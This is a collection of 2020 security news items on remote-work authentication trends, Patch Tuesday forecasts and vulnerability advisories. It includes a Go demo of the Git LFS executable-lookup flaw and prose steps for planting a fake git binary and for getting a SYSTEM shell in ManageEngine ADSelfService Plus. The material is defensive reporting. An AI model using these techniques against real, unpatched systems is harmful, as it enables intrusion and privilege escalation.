The security consequences of massive change in how we work

Organizations underwent an unprecedented IT change this year amid a massive shift to remote work, accelerating adoption of cloud technology, Duo Security reveals.


The security implications of this transition will reverberate for years to come, as the hybrid workplace requires the workforce to be secure, connected and productive from anywhere.

The report details how organizations, with a mandate to rapidly transition their entire workforce to remote, turned to remote access technologies such as VPN and RDP, among numerous other efforts.

As a result, authentication activity to these technologies swelled 60%. A complementary survey recently found that 96% of organizations made cybersecurity policy changes during the COVID-19 pandemic, with more than half implementing MFA.

Cloud adoption also accelerated

Daily authentications to cloud applications surged 40% during the first few months of the pandemic, the bulk of which came from enterprise and mid-sized organizations looking to ensure secure access to various cloud services.

As organizations scrambled to acquire the requisite equipment to support remote work, employees relied on personal or unmanaged devices in the interim. Consequently, blocked access attempts due to out-of-date devices skyrocketed 90% in March. That figure fell precipitously in April, indicating healthier devices and decreased risk of breach due to malware.

“As the pandemic began, the priority for many organizations was keeping the lights on and accepting risk in order to accomplish this end,” said Dave Lewis, Global Advisory CISO, Duo Security at Cisco. “Attention has now turned towards lessening risk by implementing a more mature and modern security approach that accounts for a traditional corporate perimeter that has been completely upended.”

Additional report findings

So long, SMS – The prevalence of SIM-swapping attacks has driven organizations to strengthen their authentication schemes. Year-over-year, the percentage of organizations that enforce a policy to disallow SMS authentication nearly doubled from 8.7% to 16.1%.

Biometrics booming – Biometrics are nearly ubiquitous across enterprise users, paving the way for a passwordless future. Eighty percent of mobile devices used for work have biometrics configured, up 12% over the past five years.

Cloud apps on pace to pass on-premises apps – Use of cloud apps is on pace to surpass use of on-premises apps by next year, accelerated by the shift to remote work. Cloud applications make up 13.2% of total authentications, a 5.4% increase year-over-year, while on-premises applications encompass 18.5% of total authentications, down 1.5% since last year.

Apple devices 3.5 times more likely to update quickly vs. Android – Ecosystem differences have security consequences. On June 1, Apple iOS and Android both issued software updates to patch critical vulnerabilities in their respective operating systems.

iOS devices were 3.5 times more likely to be updated within 30 days of a security update or patch, compared to Android.

Windows 7 lingers in healthcare despite security risks – More than 30% of Windows devices in healthcare organizations still run Windows 7, despite end-of-life status, compared with 10% of organizations across Duo’s customer base.

Healthcare providers are often unable to update deprecated operating systems due to compliance requirements and restrictive terms and conditions of third-party software vendors.

Windows devices, Chrome browser dominate business IT – Windows continues its dominance in the enterprise, accounting for 59% of devices used to access protected applications, followed by macOS at 23%. Overall, mobile devices account for 15% of corporate access (iOS: 11.4%, Android: 3.7%).

On the browser side, Chrome is king with 44% of total browser authentications, resulting in stronger security hygiene overall for organizations.

UK and EU trail US in securing cloud – United Kingdom and European Union-based organizations trail US-based enterprises in user authentications to cloud applications, signaling less cloud use overall or a larger share of applications not protected by MFA.

November 2020 Patch Tuesday forecast: Significant OS changes ahead

November Patch Tuesday and the end-of-year holidays are rapidly approaching. Microsoft gave us a late release, or maybe an early gift, depending on how you look at the new version of Windows 10. The Patch Tuesday updates appear to be light, so things are looking much better as we enter the final stretch for 2020.


The big announcement this month is the release of Windows 10 version 20H2 on October 20. Yes, you read that correctly – not the 2020 Fall Release or Windows 10 version 2009, but Windows 10 version 20H2. Name changes once again!

This update follows the feature enablement model that began last year with Windows 10 versions 1903 and 1909. The new features in Windows 10 version 20H2 are also included in the October cumulative update for Windows 10 version 2004, although they are dormant. They can be turned on via a special enablement package.

A big change regarding servicing stack updates (SSU) and the latest cumulative updates (LCU) has finally been made – LCUs and SSUs have been combined into a single cumulative monthly update! Moving forward we don’t have to worry about managing these separately. Microsoft recommends applying the latest SSU for Windows 10, version 2004 and then you can forget about SSUs in the future because they are automatically applied as needed in the cumulative updates.

This release also includes a few security updates for Microsoft Defender Advanced Threat Protection (ATP), Microsoft Defender Application Guard for Office, and biometric enhancements for Windows Hello.

Each new release comes with its share of reported issues, so please review before you update to this latest version. From some of the forums I monitor, I’ve noted a lot of conversations around device drivers and device support in general. I suspect this is not an issue unique to Windows 10 version 20H2, but is part of a carryover from Microsoft now enforcing properly signed drivers, which began last month in the cumulative update. There are a lot of good reasons to update your OS, but always ‘look before you leap’ to ensure a smooth transition.

November 2020 Patch Tuesday forecast

  • Expect Microsoft to get back on track this month. There was a major dip in common vulnerabilities and exposures (CVEs) addressed last month, and for the first time I can remember there were no updates for Internet Explorer or Edge. Anticipate updates for the standard operating systems, browsers, Office, and extended support updates for Windows 7 and Server 2008. Servicing stack updates, including those for the ESU platforms, are expected.
  • Security updates were released this week for Adobe Acrobat and Reader, so I don’t expect anything next week.
  • Apple released their latest security updates for iTunes and iCloud in late September. The next updates will probably show up late this month or early December.
  • Google Chrome 86 was updated this week with a few security updates; there is a slight chance another release may come out on Patch Tuesday but don’t count on it.
  • Mozilla Firefox and Thunderbird were updated in mid-October. We should see some additional security updates next week.
  • It looks like an average Patch Tuesday for November. If you have some spare time, check out Microsoft’s latest and greatest in Windows 10 version 20H2.

Git LFS vulnerability allows attackers to compromise targets’ Windows systems (CVE-2020-27955)

A critical vulnerability (CVE-2020-27955) in Git Large File Storage (Git LFS), an open source Git extension for versioning large files, allows attackers to achieve remote code execution if the Windows-using victim is tricked into cloning the attacker’s malicious repository using a vulnerable Git version control tool, security researcher Dawid Golunski has discovered.


It can be exploited in a variety of popular Git clients in their default configuration – GitHub CLI, GitHub Desktop, SmartGit, SourceTree, GitKraken, Visual Studio Code, etc. – and likely other clients/development IDEs (i.e., those that install git with the Git LFS extension by default).

“Web applications / hosted repositories running on Windows which allow users to import their repositories from a URL may also be exposed to this vulnerability,” Golunski added.

About the vulnerability (CVE-2020-27955)

Golunski found that Git LFS does not specify a full path to git binary when executing a new git process via a specific exec.Command() function.

“As the exec.Command() implementation on Windows systems includes the current directory, attackers may be able to plant a backdoor in a malicious repository by simply adding an executable file named git.bat, git.exe, git.cmd or any other extension that is used on the victim’s system (PATHEXT environment dependent), in the main repo’s directory. As a result, the malicious git binary planted in this way will get executed instead of the original git binary located in a trusted path,” he explained.

The vulnerability can be triggered if the victim is tricked into cloning the attacker’s malicious repository using a vulnerable Git version control tool.
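As an added illustration (not Git LFS’s own code and not Golunski’s PoC), the Go resolver below contrasts the lookup order that let exec.Command() pick a file out of the repository directory with a hardened lookup that consults PATH only. The directory names, PATH and PATHEXT values, and the in-memory filesystem are constructed for the demo.

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

// fakeFS is a constructed stand-in for the filesystem: the set of paths
// (stored lowercase, since Windows names are case-insensitive) that "exist".
type fakeFS map[string]bool

func (f fakeFS) exists(p string) bool { return f[strings.ToLower(p)] }

// candidates lists the file names Windows tries for a bare command name,
// applying PATHEXT the way CreateProcess and cmd.exe do: "git" becomes
// git.com, git.exe, git.bat, git.cmd in PATHEXT order. A name that already
// carries an extension is tried as-is.
func candidates(name, pathext string) []string {
	if strings.Contains(name, ".") {
		return []string{name}
	}
	var out []string
	for _, ext := range strings.Split(pathext, ";") {
		if ext != "" {
			out = append(out, name+strings.ToLower(ext))
		}
	}
	return out
}

// searchDirs probes each directory in order and returns the first hit.
func searchDirs(fs fakeFS, dirs []string, name, pathext string) (string, error) {
	for _, d := range dirs {
		for _, c := range candidates(name, pathext) {
			p := d + `\` + c // explicit backslash join so the demo behaves the same on any host
			if fs.exists(p) {
				return p, nil
			}
		}
	}
	return "", errors.New("executable not found: " + name)
}

// lookPathLegacyWindows mirrors the search order Go's exec.Command used on
// Windows at the time of CVE-2020-27955: the process's current directory is
// probed before any PATH entry. (Go 1.19 later changed exec.LookPath to
// report such a match as exec.ErrDot instead of silently using it.)
func lookPathLegacyWindows(fs fakeFS, cwd, name, pathEnv, pathext string) (string, error) {
	dirs := append([]string{cwd}, strings.Split(pathEnv, ";")...)
	return searchDirs(fs, dirs, name, pathext)
}

// lookPathTrusted is the hardened resolver: it walks PATH only and skips
// entries that Windows would treat as the working directory ("" and "."),
// so a file planted in a cloned repository can never be chosen.
func lookPathTrusted(fs fakeFS, cwd, name, pathEnv, pathext string) (string, error) {
	var dirs []string
	for _, d := range strings.Split(pathEnv, ";") {
		if d == "" || d == "." || strings.EqualFold(d, cwd) {
			continue
		}
		dirs = append(dirs, d)
	}
	return searchDirs(fs, dirs, name, pathext)
}

// Constructed scenario: the victim has just cloned a repository whose
// top-level directory holds a planted git.bat, while the real git.exe
// lives in a trusted PATH directory.
const (
	repoDir = `C:\Users\victim\src\cloned-repo`
	pathEnv = `C:\Windows\System32;C:\Program Files\Git\cmd`
	pathext = `.COM;.EXE;.BAT;.CMD`
)

var demoFS = fakeFS{
	strings.ToLower(`C:\Program Files\Git\cmd\git.exe`): true,
	strings.ToLower(repoDir + `\git.bat`):               true,
}

func main() {
	legacy, _ := lookPathLegacyWindows(demoFS, repoDir, "git", pathEnv, pathext)
	trusted, _ := lookPathTrusted(demoFS, repoDir, "git", pathEnv, pathext)
	fmt.Println("legacy :", legacy)  // the planted git.bat inside the repository
	fmt.Println("trusted:", trusted) // C:\Program Files\Git\cmd\git.exe
}
```

The same check applies to any tool that spawns a helper by bare name from inside an untrusted checkout: resolve the binary against PATH once, ignoring the working directory, and pass the absolute path to the process launcher.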

Golunski says that CVE-2020-27955 is trivial to exploit, and has released PoC exploit code, as well as video demonstrations of the exploit in action on various Git clients.

What to do?

The vulnerability affects Git LFS versions 2.12 or earlier on Windows systems (but not on Unix). According to the Git LFS maintainers, there is no workaround for this issue other than avoiding untrusted repositories.

Affected users and product vendors are advised to update to the latest Git LFS version (v2.12.1, released on Wednesday), which plugged the security hole. Git for Windows has also been updated to include this Git LFS version.

New Windows Zero-Day


Google’s Project Zero has discovered and published a buffer overflow vulnerability in the Windows Kernel Cryptography Driver. The exploit doesn’t affect the cryptography, but allows attackers to escalate system privileges:

Attackers were combining an exploit for it with a separate one targeting a recently fixed flaw in Chrome. The former allowed the latter to escape a security sandbox so the latter could execute code on vulnerable machines.

The vulnerability is being exploited in the wild, although Microsoft says it’s not being exploited widely. Everyone expects a fix in the next Patch Tuesday cycle.


Google discloses actively exploited Windows zero-day (CVE-2020-17087)

Google researchers have made public a Windows kernel zero day vulnerability (CVE-2020-17087) that is being exploited in the wild in tandem with a Google Chrome flaw (CVE-2020-15999) that has been patched on October 20.


About CVE-2020-17087

CVE-2020-17087 is a vulnerability in the Windows Kernel Cryptography Driver, and “constitutes a locally accessible attack surface that can be exploited for privilege escalation (such as sandbox escape).”

More technical information has been provided in the Chromium issue tracker entry, which was kept inaccessible to the wider public for the first seven days, but has now been made public.

The researchers have also included PoC exploit code, which has been tested on Windows 10 1903 (64-bit), but they noted that the affected driver (cng.sys) “looks to have been present since at least Windows 7,” meaning that all the other supported Windows versions are probably vulnerable.

Exploitation and patching

Shane Huntley, Director of Google’s Threat Analysis Group (TAG) confirmed that the vulnerability chain is being used for targeted exploitation and that the attacks are “not related to any US election-related targeting.”

The attackers are using the Chrome bug to gain access to the target system and then CVE-2020-17087 to gain administrator access on it.

A patch for the issue is expected to be released on November 10, as part of the monthly Patch Tuesday effort by Microsoft.


While the bug is serious, the fact that it’s being used in targeted (and not widespread) attacks should reassure most users they’ll be safe until the patch is released.

Also, according to a Microsoft spokesperson, exploitation of the flaw has only been spotted in conjunction with the Chrome vulnerability, which has been patched in Chrome and other Chromium-based browsers (e.g., Opera on October 21, Microsoft Edge on October 22).

Users who have implemented those updates are, therefore, safer still.

HP Device Manager vulnerabilities may allow full system takeover

Three vulnerabilities affecting HP Device Manager, an application for remote management of HP Thin Client devices, could be chained together to achieve unauthenticated remote command execution as SYSTEM, security researcher Nick Bloor has found.


The vulnerabilities were patched by HP nearly two weeks ago, but additional vulnerability and research details published on Monday may help attackers to craft a working exploit.

The vulnerabilities

Thin clients are low-performance computers optimized for establishing a remote connection with a server-based computing environment.

HP Device Manager allows IT admins to remotely deploy, update, and manage thousands of HP Thin Clients through a single console.

The three vulnerabilities discovered by Bloor “may allow locally managed accounts within HP Device Manager to be susceptible to dictionary attacks due to weak cipher implementation (CVE-2020-6925) and allow a malicious actor to remotely gain unauthorized access to resources (CVE-2020-6926), and/or allow a malicious actor to gain SYSTEM privileges (CVE-2020-6927).”

CVE-2020-6925 and CVE-2020-6926 affect all versions of HP Device Manager, while CVE-2020-6927 (a privilege escalation vulnerability) affects HP Device Manager 5.0.0 to 5.0.3.

CVE-2020-6925 doesn’t impact customers who are using Active Directory authenticated accounts, HP pointed out, and CVE-2020-6927 doesn’t impact customers who are using an external database and have not installed the integrated Postgres service.

Fixes and mitigations

HP has provided a security update for the HP Device Manager 5.0.x branch – HPDM v5.0.4 – and will include the fixes for the 4.x branch in HP Device Manager 4.7 Service Pack 13.

Partial mitigations are also available, and include:

  • Limiting incoming access to Device Manager ports 1099 and 40002 to trusted IPs or localhost only
  • Removing the dm_postgres account from the Postgres database; or updating the dm_postgres account password within HP Device Manager Configuration Manager; or creating an inbound rule within Windows Firewall configuration to configure the PostgreSQL listening port (40006) for localhost access only

Admins are advised to implement the offered security updates or mitigations as soon as possible.

Nmap 7.90 released: New fingerprints, NSE scripts, and Npcap 1.0.0

Over a year has passed since Nmap was last updated, but this weekend Gordon “Fyodor” Lyon announced Nmap 7.90.


About Nmap

Nmap is a widely used free and open-source network scanner.

The utility is used for network inventorying, port scanning, managing service upgrade schedules, monitoring host or service uptime, etc.

It works on most operating systems: Linux, Windows, macOS, Solaris, and BSD.

Nmap 7.90

First and foremost, Nmap 7.90 comes with Npcap 1.0.0, the first completely stable version of the raw packet capturing/sending driver for Windows.

Prior to Npcap, Nmap used WinPcap, but that driver hadn’t been updated since 2013, didn’t always work on Windows 10, and depended on long-deprecated Windows APIs.

“While we created Npcap for Nmap, it turns out that many other projects and companies had the same need. Wireshark switched to Npcap with their big 3.0.0 release last February, and Microsoft publicly recommends Npcap for their Azure ATP (Advanced Threat Protection) product,” Lyon explained.

“We introduced the Npcap OEM program allowing companies to license Npcap OEM for use within their products or for company-internal use with commercial support and deployment automation. This project that was expected to be a drain on our resources (but worthwhile since it makes Nmap so much better) is now helping to fund the Nmap project. The Npcap OEM program has also helped ensure Npcap’s stability by deploying it on some of the fastest networks at some of the largest enterprises in the world.”

Nmap 7.90 also comes with:

  • New fingerprints for better OS and service/version detection
  • 3 new NSE scripts, new protocol libraries and payloads for host discovery, port scanning and version detection
  • 70+ smaller bug fixes and improvements
  • Build system upgrades and code quality improvements

“We also created a special ‘Nmap OEM Edition’ for the companies who license Nmap to handle host discovery within their products. We have been selling such licenses for more than 20 years and it’s about time OEMs have an installer more customized to their needs,” Lyon added.

September 2020 Patch Tuesday: Microsoft fixes over 110 CVEs again

On this September 2020 Patch Tuesday:

  • Microsoft has plugged 129 security holes, including a critical RCE flaw that could be triggered by sending a specially crafted email to an affected Exchange Server installation
  • Adobe has delivered security updates for Adobe Experience Manager, AEM Forms, Framemaker and InDesign
  • Intel has released four security advisories
  • SAP has released 10 security notes and updates to six previously released notes


Microsoft’s updates

Microsoft has released patches for 129 CVEs, 23 of which are “critical”, 105 “important”, and one “medium”-risk (a security feature bypass flaw in SQL Server Reporting Services). None of them are publicly known or being actively exploited.

Trend Micro Zero Day Initiative’s Dustin Childs says that patching CVE-2020-16875, a memory corruption vulnerability in Microsoft Exchange, should be top priority for organizations using the popular mail server.

“This patch corrects a vulnerability that allows an attacker to execute code at SYSTEM by sending a specially crafted email to an affected Exchange Server. That doesn’t quite make it wormable, but it’s about the worst-case scenario for Exchange servers,” he explained. “We have seen the previously patched Exchange bug CVE-2020-0688 used in the wild, and that requires authentication. We’ll likely see this one in the wild soon.”

Another interesting patch released this month is that for CVE-2020-0951, a security feature bypass flaw in Windows Defender Application Control (WDAC). Patches are available for Windows 10 and Windows Server 2016 and above.

“This patch is interesting for reasons beyond just the bug being fixed. An attacker with administrative privileges on a local machine could connect to a PowerShell session and send commands to execute arbitrary code. This behavior should be blocked by WDAC, which does make this an interesting bypass. However, what’s really interesting is that this is getting patched at all,” Childs explained.

“Vulnerabilities that require administrative access to exploit typically do not get patches. I’m curious about what makes this one different.”

Many of the critical and important flaws fixed this time affect various editions of Microsoft SharePoint (Server, Enterprise, Foundation). Some require authentication, but many do not, so if you don’t want to fall prey to exploits hidden in specially crafted web requests, pages or SharePoint application packages, see that you install the required updates soon.

Satnam Narang, staff research engineer at Tenable, pointed out that one of them – CVE-2020-1210 – is reminiscent of a similar SharePoint remote code execution flaw, CVE-2019-0604, that has been exploited in the wild by threat actors since at least April 2019.

CVE-2020-0922, an RCE in Microsoft COM (Component Object Model), should also be patched quickly on all Windows and Windows Server systems.

“As COM is the base framework of Microsoft services like ActiveX, OLE, DirectX, and Windows Shell, if left unpatched it would give a malicious player a large target to focus on when seeking out vulnerabilities in a network. Given that the exploit can be taken advantage of through a simple malicious JavaScript or website, potentially delivered through a phishing email, it is necessary to address to minimize a network’s attack surface,” noted Richard Melick, Senior Technical Product Manager, Automox.

He also advised organizations in the financial industry who use Microsoft Dynamics 365 for Finance and Operations (on-premises) and Microsoft Dynamics 365 (on-premises) to quickly patch CVE-2020-16857 and CVE-2020-16862.

“Impacting the on-premise servers with this finance and operations focused service installed, both exploits require a specifically created file to exploit the security vulnerability, allowing the attacker to gain remote code execution capability. More concerning with these vulnerabilities is that both flaws, if exploited, would allow an attacker to steal documents and data deemed critical. Due to the nature and use of Microsoft Dynamics in the financial industry, a theft like this could spell trouble for any company of any size,” he added.

Jimmy Graham, Sr. Director of Product Management, Qualys, says that Windows Codecs, GDI+, Browser, COM, and Text Service Module vulnerabilities should be prioritized for workstation-type devices.

Adobe’s updates

Adobe has released security updates for Adobe Experience Manager (AEM) – a web-based client-server system for building, managing and deploying commercial websites and related services – and the AEM Forms add-on package for all platforms, Adobe Framemaker for Windows and Adobe InDesign for macOS.

The AEM and AEM Forms updates are more important than the rest.

The former fix eight critical and important flaws, most of which allow arbitrary JavaScript execution or HTML injection in the browser. The latter plug three critical security holes that carry the same risk (i.e., that of an attacker running malicious code on a victim’s machine).

The Adobe Framemaker update fixes two critical flaws that could lead to code execution, and the Adobe InDesign update five of them, but as vulnerabilities in these two offerings are not often targeted by attackers, admins are advised to implement them after more critical updates are secured.

None of the fixed vulnerabilities are being currently exploited in the wild.

Intel’s updates

Intel took advantage of the September 2020 Patch Tuesday to release four advisories, accompanying fixes for the Intel Driver & Support Assistant, BIOS firmware for multiple Intel Platforms, and Intel Active Management Technology (AMT) and Intel Standard Manageability (ISM).

The latter fixes are the most important, as they fix a privilege escalation flaw that has been deemed to be “critical” for provisioned systems.

SAP’s updates

SAP marked the September 2020 Patch Tuesday by releasing 10 security notes and updates to six previously released ones (for SAP Solution Manager, SAP NetWeaver, SAPUI5 and SAP NetWeaver AS JAVA).

Patches have been provided for newly fixed flaws in a variety of offerings, including SAP Marketing, SAP NetWeaver, SAP Bank Analyzer, SAP S/4HANA Financial Products, SAP Business Objects Business Intelligence Platform, and others.

September 2020 Patch Tuesday forecast: Back to school?

Another month has passed working from home and September Patch Tuesday is upon us. For most of us here in the US, September usually signals back to school for our children and with that comes a huge increase in traffic on our highways. But I suspect with the big push for remote learning from home, those of us in IT may be more worried about the increase in network traffic. So, should we expect a large number of updates this Patch Tuesday that will bog down our networks?

The good news is that I expect a more limited release of updates from Microsoft and third-party vendors this month. In August, we saw a HUGE set of updates for Office and also an unexpected .NET release after just having one in July.

Also looking back to last month, there were some reported issues on the Windows 10 version 1903, 1909, and 2004 updates. Applying the updates for KB 4565351 or KB 4566782 resulted in a failure for many users on automatic updates with return codes/explanations that were not very helpful. Let’s hope the updates are more stable this month without the need to re-apply, or worse, redistribute these large updates across our networks using even more bandwidth.

Last month I talked about software end-of-life (EOL) and making sure you had a plan in place to properly protect your systems in advance. Just as an early reminder we have the EOL of Windows Embedded Standard 7 coming up on October Patch Tuesday. Microsoft will offer continued Extended Security Updates (ESUs) for critical and important security updates just like they did for Windows 7 and Server 2008.

These updates will be available for three years through October 2023. Microsoft also provided an update on the ‘sunset’ of the legacy Edge browser in March 2021 along with the announcement that Microsoft 365 apps and services will no longer support IE 11 starting in August 2021. They made it clear IE 11 is not going away anytime soon, but the new Edge is required for a modern browser experience. These changes are all still a few months out but plan accordingly.

September 2020 Patch Tuesday forecast

  • We’ll see the standard operating system updates, but as I mentioned earlier, with the large Office and individual application updates released last month, expect both a smaller and a more limited set this time.
  • Service stack updates (SSUs) are hit or miss each month. The last required update was released in May. Expect to see a few in the mix once again.
  • A security update for Acrobat and Reader came out last Patch Tuesday. There are no pre-announcements on their web site so we may see a small update, if any.
  • Apple released security updates last month for iTunes and iCloud, so we should get a break this month if they maintain their quarterly schedule.
  • Google Chrome 85 was released earlier this week, but we may see a security release if they have any last-minute fixes for us.
  • We’re due for a Mozilla security update for Firefox and Thunderbird. The last security release was back on August 25.

Remote security management of both company-provided and user-attached systems provides many challenges. With a projected light set of updates this month, hopefully tying up valuable bandwidth isn’t one of those challenges.

Tech Data expands Cloud Solution Factory with Windows Virtual Desktop on Azure Click-to-Run Solution

Tech Data announced that it has expanded its Cloud Solution Factory offering with the addition of a new Windows Virtual Desktop on Azure Click-to-Run Solution, which increases remote workforce productivity while ensuring data and applications can be securely accessed from any location using any device.

“As remote work continues to accelerate and the desktop-as-a-service market grows into what Gartner expects will become a nearly $3 billion business in 2021, so too will the need for virtualization powered by cloud technology,” said Sergio Farache, executive vice president of strategy, innovation, cloud, and M&A, Tech Data.

“As a leader in cloud and next-generation solution aggregation, Tech Data makes cloud adoption simple by significantly reducing cloud configuration and deployment processes so that our channel partners can serve their customers more effectively and with fewer risks.

“We look forward to delivering higher value to our partner ecosystem with the addition of the Windows Virtual Desktop on Azure Click-to-Run Solution to our Cloud Solution Factory.”

The deployment and configuration of the Windows Virtual Desktop on Azure Click-to-Run Solution can happen in minutes, versus the hours or days it typically takes without the use of Tech Data’s automation technology stack.

The automated setup is optimized to deliver a multi-session Windows 10 experience with expanded capabilities to support graphic-intensive applications like Autodesk. The solution also ensures high-performance workloads can be accessed anywhere.

Tech Data supports Windows Virtual Desktop deployments with a variety of professional services, including the ability to conduct cloud-readiness assessments, assist with migrations and provide fully managed desktop-as-a-service offerings.

As a result, Tech Data partners can deliver a comprehensive and seamless virtual desktop experience that offers secure access to data, higher rates of compliance and the ability to facilitate an increasingly flexible virtual workplace environment that can scale on demand and meet the evolving demands of a digital workforce.

“This solution is a game-changer for us,” said Steve Slack, IT technical manager at INFINITY IT Solutions, a Tech Data reseller partner.

“Instead of investing a lot of time and money researching and developing a way to overcome this challenge ourselves, Tech Data’s solution is ready for us to take to market during this pivotal moment in which the need to optimize the remote workforce has never been so strong.

“We are confident that Tech Data’s Windows Virtual Desktop on Azure Click-to-Run Solution will help businesses that need to quickly set up a secure and productive temporary digital workspace, as well as those that are embarking on longer-term digital transformation projects aimed at modernizing the way people collaborate and work in an online environment.”

To help customers strike a balance between security and productivity, Tech Data offers its Modern Workplace with Secure Score Click-to-Run Solution as a complement to any Windows Virtual Desktop deployment. Doing so establishes a security baseline with automated policy enforcement for Microsoft 365 users.

In addition, Tech Data’s Windows Virtual Desktop offering provides flexible sizing options available in the company’s StreamOne Cloud Marketplace, including the built-in capability to support graphic-intensive workloads commonly used in engineering and design applications.

The Windows Virtual Desktop on Azure Click-to-Run Solution can be automatically deployed into a new or existing Microsoft Azure subscription.

Tech Data’s Solution Factory methodology enables its channel partners and their customers to solve business challenges with click-to-run solutions that are designed for simple and fast deployment. These solutions are developed by combining Tech Data’s IT expertise with its vast ecosystem of cloud, analytics and IoT and security technologies to deliver desired business outcomes.

JumpCloud App for Windows: Enabling secure credential and identity management

JumpCloud announced the release of the JumpCloud App for Windows, the latest update to its patent-pending strategy for enabling secure credential and identity management from an employee’s device.

The release follows its Apple macOS App release, which established the company’s strategy for a device-centric approach to secure corporate password updates.

Employees safely manage and modify their credentials from within the confines of JumpCloud-managed Windows and macOS hosts, eliminating attack vectors such as phishing emails, deepfake portals, and similar social engineering methods which pose as a company’s mandated way to update passwords.

The JumpCloud Windows App streamlines credential management workflows and establishes the employee’s workstation or laptop as a trusted device.

Along with JumpCloud’s endpoint-management capabilities, i.e. System Insights, configuration policies, full disk encryption, multi-factor authentication (MFA), and user account management, the Windows App allows the employee to interact with their corporate JumpCloud identity, access their User Portal securely to launch into applications via SSO, and update their corporate password.

A password change simultaneously updates their device password in addition to all other resources the employee is connected to via JumpCloud’s cloud-based directory service.

“As users find themselves managing credentials for an ever-growing number of online platforms, they’re also targets for phishing attempts that have become increasingly sophisticated and difficult to distinguish from legitimate requests,” said KellyAnn Fitzpatrick, Industry Analyst at RedMonk.

“JumpCloud’s Windows App – like its existing offering for macOS – is designed to help organizations eliminate the risk of email-based phishing schemes for associated user accounts by centralizing identity management on associated individuals’ devices.”

“The one place an employee should trust to manage their credentials is within their device, not over the open internet and not exclusively by an email reminder,” said Greg Keller, CTO at JumpCloud.

“JumpCloud’s security policies, MFA, and our Windows and macOS apps provide the assurance that IT and security teams need for the most secure means to protect their employees.”

Critical ManageEngine ADSelfService Plus RCE flaw patched

A critical vulnerability (CVE-2020-11552) in ManageEngine ADSelfService Plus, an Active Directory password-reset solution, could allow attackers to remotely execute commands with SYSTEM-level privileges on the target Windows host.


About ManageEngine ADSelfService Plus

ManageEngine ADSelfService Plus is developed by ManageEngine, a division of Zoho Corporation, a software development company that focuses on web-based business tools and information technology.

“ADSelfService Plus supports self-service password reset for WFH and remote users by enabling users to reset Windows password from their own machines and updating the cached credentials through a VPN client,” the company touts.

It also supports sending password expiration notifications to remote users through email, SMS, and push notifications; provides admins with a way to force 2-factor authentication for Windows logons; and provides users with secure access to all SAML-supported enterprise applications (e.g., Office 365, G Suite, Salesforce) through AD-based single sign-on.

About the vulnerability (CVE-2020-11552)

Unearthed and flagged by Bhadresh Patel, CVE-2020-11552 stems from the solution not properly enforcing user privileges associated with Windows Certificate Dialog.

The ManageEngine ADSelfService Plus thick client software enables users to perform a password reset or an account unlock action by using the self-service option on the Windows login screen. When one of these options is selected, the client software is launched and connects to a remote ADSelfService Plus server to facilitate the self-service operations.

“A security alert can/will be triggered when ‘an unauthenticated attacker having physical access to the host issues a self-signed SSL certificate to the client’. Or, ‘a (default) self-signed SSL certificate is configured on ADSelfService Plus server’,” he noted.

“‘ViewCertificate’ option from the security alert will allow an attacker with physical access or a remote attacker with RDP access, to export a displayed certificate to a file. This will further cascade to the standard dialog/wizard which will open file explorer as SYSTEM. By navigating file explorer through ‘C:\windows\system32’, a cmd.exe can be launched as SYSTEM.”

Patel also published a PoC exploit video (the exploitation part starts at 5:30).


ManageEngine patched CVE-2020-11552 twice, because the first patch only fixed the issue partially. Admins are advised to upgrade to ADSelfService Plus build 6003, which contains the complete security fix.

Researchers flag two zero-days in Windows Print Spooler

In May 2020, Microsoft patched CVE-2020-1048, a privilege escalation vulnerability in the Windows Print Spooler service discovered by Peleg Hadar and Tomer Bar from SafeBreach Labs. A month later, the two researchers found a way to bypass the patch and re-exploit the vulnerability on the latest Windows version. Microsoft assigned this vulnerability a new identification number – CVE-2020-1337 – and will patch it on August 2020 Patch Tuesday. They’ve also discovered a DoS flaw affecting … More

The post Researchers flag two zero-days in Windows Print Spooler appeared first on Help Net Security.

August 2020 Patch Tuesday forecast: Planning for the end?

There doesn’t seem to be an end in sight to the COVID-19 crisis, but there are some important end-of-life/end-of-support dates we should be aware of when it comes to software.


Before we dig into this month’s forecast of updates, I want to spend a little time on the importance of planning ahead to avoid the high costs associated with extended support contracts, or sometimes worse, modifying your network environment to mitigate risks.

Remember when Windows XP end-of-life was a ‘date on the horizon’ that you would deal with when it got closer? Suddenly Windows 7 has reached the same point. In fact, we’ve just gone over the six-month point in the first year of Extended Support Updates for Windows 7 and Server 2008.

The operational lifespan of an operating system version is shrinking, and the model has changed as Microsoft moved to the software-as-a-service model for Windows 10. It is imperative we keep track of critical dates associated with both operating systems and applications in order to maintain a functional work environment.

Microsoft has extended the support dates on a few operating systems, but those dates are rapidly approaching. The Enterprise and Education editions of Windows 10 versions 1709 and 1803 reach end of service in October and November respectively this year. The Home and Professional editions of Windows 10 version 1809 reach end-of-service in November as well. Double check your applications to ensure compatibility as you make the operating system upgrades on these systems – you only have 2-3 months left!

We have a little breathing room for the remaining non-Windows 10 operating systems. Both Windows 8.1 and the Server 2012 variations reach their end-of-extended-support in October 2023. Once we reach that point in time, we’ll only have Windows 10 left (or the latest new operating system from Microsoft).

There will be situations where you’ll reach the end of support and there won’t be new patches for the system, but you need to maintain the operating systems and their legacy applications to meet business needs. You’ll need to look at other options to mitigate the security risks introduced by these increasingly vulnerable systems.

Consider virtualization or locking down the system to run only the specific applications you need. Electronic separation is another option—moving them from direct internet connectivity or into more protected parts of your network. Heightened monitoring through next-gen antivirus or endpoint detection and response solutions can also provide added protection. Choose what works best for you but have a plan and timeline in place for their replacement.

My forecast last month was accurate with regards to record numbers of CVEs addressed. I don’t believe we’ll see this sustained growth but expect a higher than average number to be addressed again this month.

August 2020 Patch Tuesday forecast

  • Expect a normal set of operating system and application updates, including ESUs, from Microsoft. I’ve been anticipating a SQL server or Exchange server update, so maybe it will happen this month?
  • Every operating system received a service stack update (SSU) last month. We may get a break here next week.
  • In keeping with the ‘planning for the end’ theme this month, Adobe Flash reaches end-of-life at the end of the year. Plan accordingly because a lot of applications still rely on Flash. Adobe may be giving Flash extra attention as we near the end of its life, so be on the lookout.
  • We have a pre-notification from Adobe that APSB20-48 for Acrobat and Reader should release on patch Tuesday.
  • Apple released security update 12.10.8 for Windows iTunes at the end of July. We could see a similar update for iCloud this week.
  • Google Chrome 85 is in the beta channel and may be released next week.
  • Mozilla provided security updates for Firefox 79, Firefox 68 ESR and 78 ESR, as well as Thunderbird 68 and 78 the last week of July. There is a small possibility of a minor security update for some of these applications next week.

The days of sitting on an operating system for 5-10 years with just patching are gone. Patching remains critical for the tactical protection of your systems, but strategic planning for the ongoing upgrades of operating systems and applications is the key to their long-term stability and security.

